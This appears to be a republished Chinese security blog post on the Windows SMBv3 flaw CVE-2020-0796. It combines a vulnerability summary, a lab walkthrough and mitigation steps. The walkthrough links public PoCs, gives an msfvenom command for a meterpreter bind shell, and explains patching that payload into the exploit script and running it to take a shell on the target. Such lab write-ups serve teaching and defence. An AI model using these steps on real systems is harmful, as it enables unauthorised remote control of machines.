本文共 1847 字,大约阅读时间需要 6 分钟。
2017年,“永恒之蓝”,
3年之后,
“永恒之黑” 来了。
漏洞介绍
3月12日, 微软披露了一个最新的SMBv3(3.1.1)远程代码执行漏洞(CVE-2020-0796),俗称“永恒之黑”。本漏洞源于SMBv3没有正确处理压缩的数据包,在解压数据包的时候使用客户端传过来的长度进行解压时,并没有检查长度是否合法,最终导致整数溢出。利用该漏洞,攻击方可直接远程攻击SMB服务端远程执行任意恶意代码,亦可通过构建恶意SMB服务端诱导客户端连接从而大规模攻击客户端。永恒之黑一旦被成功利用,其危害不亚于永恒之蓝。
同时,CVE-2020-0796漏洞与“永恒之蓝”系列漏洞极为相似,都是利用Windows SMB漏洞远程攻击获取系统最高权限。 漏洞危害等级:高危 “永恒之黑”漏洞高危之处在于对SMB客户端的攻击,攻击者可以通过构造一个“特制”的网页、压缩包、共享目录、OFFICE文档等,向攻击目标发送,一旦被攻击者打开则瞬间触发漏洞受到攻击。 漏洞影响范围 Windows 10 Version 1903 for 32-bit SystemsWindows 10 Version 1903 for x64-based SystemsWindows 10 Version 1903 for ARM64-based SystemsWindows Server, Version 1903 (Server Core installation)Windows 10 Version 1909 for 32-bit SystemsWindows 10 Version 1909 for x64-based SystemsWindows 10 Version 1909 for ARM64-based SystemsWindows Server, Version 1909 (Server Core installation)漏洞复现
想要复现这个永恒之黑,大家可以搭建靶机来完成,如下所示:
1、环境准备
Win10 靶机:192.168.183.133
Kali 攻击机:192.168.183.136
一定要记住:关闭防火墙,关闭防火墙,关闭防火墙!!!
2、查看环境情况
Windows版本,按win+r,在弹出窗口中,输入 winver
3、使用SMBGhost工具检测靶机是否存在漏洞
SMBGhost下载地址:https://github.com/ollypwn/SMBGhost
4、使用蓝屏payload,验证漏洞
蓝屏POC地址:https://github.com/chompie1337/SMBGhost_RCE_PoC
演示:蓝屏
以上的步骤成功证明漏洞存在。
5、利用msf生成exp反弹shell
msfvenom -p windows/x64/meterpreter/bind_tcpLPORT=4444 -b '\x00' -i 1 -f python>exploit
打开蓝屏POC 的exploit.py 文件将生成的 USER_PAYLOAD 替换为生成的exp
(注意:buf 要替换为 USER_PAYLOAD)
蓝屏POC exploit 实况图
Msf生成exp实况图
修改exploit.py 文件 实况图
6、设置msf监听
use payload windows/x64/meterpreter/bind_tcpset lport 监听端口Set rhost 目标ip
run/exploit 执行监听
7、运行修改之后的exp
python3 exploit.py -ip 目标ip
成功反弹meterpreter,执行shell命令查看IP地址为win10机器地址
漏洞修复
1、更新系统、完成补丁的安装: 操作步骤:设置->更新和安全->Windows更新,点击“检查更新”。 2、不更新系统的临时应对方法: 运行regedit.exe,打开注册表编辑器,在HKLM\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters建立一个名为DisableCompression的DWORD,值为1,禁止SMB的压缩功能。 3、封禁SMB通信445端口。 永恒之蓝复现: MS17-010漏洞回顾 END信安客旨在培养网络安全人才,分享安全行业最新动态、技术交流、等保相关标准等。
转载地址:http://hoqms.baihongyu.com/